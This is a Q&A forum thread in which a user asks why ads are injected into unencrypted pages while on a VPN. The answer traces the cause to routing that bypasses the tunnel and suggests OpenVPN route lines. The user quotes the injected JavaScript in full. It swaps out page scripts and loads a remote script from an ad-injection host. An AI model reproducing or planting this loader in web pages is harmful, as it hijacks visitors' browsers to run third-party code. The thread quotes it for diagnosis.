0

I'm using Sophos SSL VPN Client. But I'm using BSNL ISP. Whenever I connect my VPN and browse any HTTP non-secured websites ADS gets injected into the JS script file. But when I disconnect a VPN and browse any non-secured websites. Script injection doesn't happen and ADS won't display

But my question is how does my ISP BSNL recognizes that I'm browsing a non-secured website after connecting to the secure tunnel. So that all the network traffic routed will be encrypted. But how do they use Network Proxy Analyzer to inject script?

Here you will find the log when connected to VPN

OpenVPN 2.3.8 i686-w64-mingw32 [SSL (OpenSSL)] [LZO] [IPv6] built on Jul  3 2017
library versions: OpenSSL 1.0.2l  25 May 2017, LZO 2.09

Data Channel Encrypt: Cipher 'AES-128-CBC' initialized with 128 bit key
Data Channel Encrypt: Using 256 bit message hash 'SHA256' for HMAC authentication
Data Channel Decrypt: Cipher 'AES-128-CBC' initialized with 128 bit key
Data Channel Decrypt: Using 256 bit message hash 'SHA256' for HMAC authentication
Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 2048 bit RSA

Script(JS)

!function() {
    var a = "/analytics.js"
      , r = null
      , e = document.getElementsByTagName("script")
      , i = e.length
      , n = null
      , t = Date.now()
      , s = null
      , o = 0;
    for ("/" === a.substring(0, 1) && (a = a.substring(1)),
    o = 0; o < i; o += 1)
        if (void 0 !== e[o].src && null !== e[o].src && e[o].src.indexOf(a) > -1) {
            n = o,
            r = e[o];
            break
        }
    void 0 !== r && null !== r || (r = document.getElementsByTagName("script")[0]),
    s = r.src.indexOf("?") > -1 ? r.src + "&cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" : r.src + "?cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";
    try {
        if (void 0 === window.sarazasarazaNoti || null === window.sarazasarazaNoti || window.sarazasarazaNoti === Array && window.sarazasarazaNoti.indexOf(r.src) < 0) {
            void 0 !== window.sarazasarazaNoti && null !== window.sarazasarazaNoti || (window.sarazasarazaNoti = new Array),
            window.sarazasarazaNoti.push(r.src);
            var c = r.parentNode
              , d = r;
            if (r.async || r.defer || null !== n && n !== e.length - 1) {
                var w = document.createElement("script");
                w.src = s,
                c.replaceChild(w, d)
            } else
                document.write("<script type='text/javascript' src=" + s + "><\/script>"),
                c.removeChild(d)
        }
    } catch (a) {}
}();
document.addEventListener('DOMContentLoaded', function() {
    var esp = document.createElement('span');
    var esr = document.createElement('script');
    esr.src = 'http://allashail.club/rNUma4ZKIVZiq/7257?ndn=ch2';
    esr.type = 'text/javascript';
    esp.appendChild(esr);
    document.body.appendChild(esp);
}, false);

HTML (Script Injection)

<html>
   <head>
      <script src="http://www.google-analytics.com/analytics.js?cb=1585885601053&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>
   </head>
   </body>
   <span>
      <script src="http://allashail.club/rNUma4ZKIVZiq/7257?ndn=ch2" type="text/javascript"></script>
   </span>
   </body>
</html>

OpenVPN config

client
dev tun
proto tcp
verify-x509-name "OU=Domain Control Validated, CN=*.domain.com"
route remote_host 255.255.255.255 net_gateway
resolv-retry infinite
nobind
persist-key
persist-tun
<ca>
Bag Attributes: <No Attributes>
subject=/C=BE/O=GlobalSign nv-sa/CN=XXXSSL CA - SHA256 - G2
issuer=/C=BE/O=GlobalSign nv-sa/OU=Root CA/CN=GlobalSign Root CA
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
</key>
auth-user-pass pass.txt
cipher AES-128-CBC
auth SHA256
comp-lzo no
route-delay 4
verb 3
reneg-sec 86400

remote xxx.xx.xxx.xx 8443
remote xxx.xx.xxx.xx 8443
remote xxx.xx.xxx.xx 8443
remote xxx.xxx.xxx.xx 8443
remote xxx.xxx.xxx.xx 8443

To establish a secure connection. How should we need to configure my Sophos SSL VPN Client using OpenVPN protocol

Nɪsʜᴀɴᴛʜ ॐ
  • 143
  • 1
  • 10
  • Are you sure its your ISP injecting stuff when you are connected across the VPN. They should not be able to do this if the VON is set up correctly... If your VPN provider is injecting this though that would make sense. – davidgo Apr 04 '20 at 09:41
  • Let me just narrow our discussion, it's the ISP who are injecting scripts via some kind of proxy analyzer software. Whenever any request are made via non-http site having single `.js` they would tamper and inject it into HTML. It definitely not the VPN providers. Even though in some organization without VPN they had injected. @davidgo – Nɪsʜᴀɴᴛʜ ॐ Apr 04 '20 at 09:50
  • Assuming that the connection is (a) encrypted, (b) routes everything - including DNS through it (c) the encryption is not compromised and (d) bad information is not cached it is impossible for your ISP to do this. What is left is to find out which of these factors is not in place. Can you show your routing table and dhcp lease info (to see the name server in use) to rule out the most likely weaknesses? – davidgo Apr 04 '20 at 18:47
  • [Click Here](https://pastebin.com/VFzWy3X0) @davidgo – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 04:09

1 Answers1

1

...my question is how does my ISP BSNL recognizes that I'm browsing a non-secured website after connecting to the secure tunnel...

Looking at your routing table (after the VPN is up) the traffic to the wider Internet is still going via your ISP, not across your tunnel, which is why your ISP can intercept it.

If you look, your "default gateway" (the line 0.0.0.0 netmask 0.0.0.0 with a gateway of 192.168.43.1) is the same on both line 13 - before the VPN and on line 53 - after the VPN. The VPN does appear to be adding routes - but all these routes are very specific and not Internet routable. For example there is no more specific route for 8.8.8.8 - or most other Internet addresses. It looks like your VPN provider is either not pushing a default route to you, or your side is not accepting it, and this is the core of your problem.

There are a number of ways this can be fixed. One would be to add the following 2 lines to your configuration file and restart your VPN:

  route 0.0.0.0 128.0.0.0
  route 128.0.0.0 128.0.0.0

These 2 lines will match all IPV4 space (0.0.0.0 - 127.255.255.25 and 128.0.0.0 - 255.255.255.255) and the combined effect is equivalent to adding a default gateway that is preferred to the existing one as it is made up of more specific routes.

If this is successful, the 2 new routes will be added to your routing table when you make a VPN connection, and will be removed when it stops.

(As things stand you do not have an IPv6 default route, but if your system were to change such that you did, you would need to update your VPN such that it works with IPV6 as well)

davidgo
  • 6,222
  • 3
  • 23
  • 41
  • 1
    Digging into this a bit ( I could be wrong) - it seems like Sophos VPN is used for connecting to a corporate/business. If this is the case, depending on how its configured its possible that traffic to the wider Internet will not be routed and sites will become unreachable. It also means that the corporate providing the VPN can read your traffic as if it were the ISP, and uses their bandwidth, so it may not be an ideal solution, and should be discussed with Corporate IT department. FYI, the underlying tech is OpenVPN which is how I know the config changes to make. – davidgo Apr 05 '20 at 05:30
  • Do you mean Split Tunneling had been used. Disabled completely connecting to IPv6. But some of the sites pinged `Request time Out` Normally working for stack exchange, google sites. Even `duckduckgo.com` sites fails. As you said after adding `route` [check Here](https://pastebin.com/yw08iYiS) – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 06:04
  • Hi do we need to add any config to boost up or speed up in ovpn config file? and How Should we add routing so that we can accomplish all the sites to be browsable and how does the ISP knows that I'm connecting to the SSL VPN Client? – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 06:08
  • and [Click Here](https://pastebin.com/7wPQ0HPQ) is the tracing route without adding the route that you had specified. How come before and after connecting to VPN still remains same? – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 06:17
  • Is it possible to browse all the sites after adding route and installing [DNS Crypt](https://github.com/DNSCrypt/dnscrypt-proxy/wiki/Installation-Windows) – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 06:32
  • My second route statement had a typo (an extra .0) so wasnt showing in the route table. That meant only half the routes were going through the tunnel. My guess is that those were failing, and the other half taking the wrong path direct through your ISP. – davidgo Apr 05 '20 at 09:15
  • I can't answer the rest of your questions unless I know the end goal, what the Sophos box is doing and who controls it. I have no clue where dnscrypt fits into your thinking or why. – davidgo Apr 05 '20 at 09:20
  • Let us [continue this discussion in chat](https://chat.stackexchange.com/rooms/106340/discussion-between-ns--and-davidgo). – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 09:37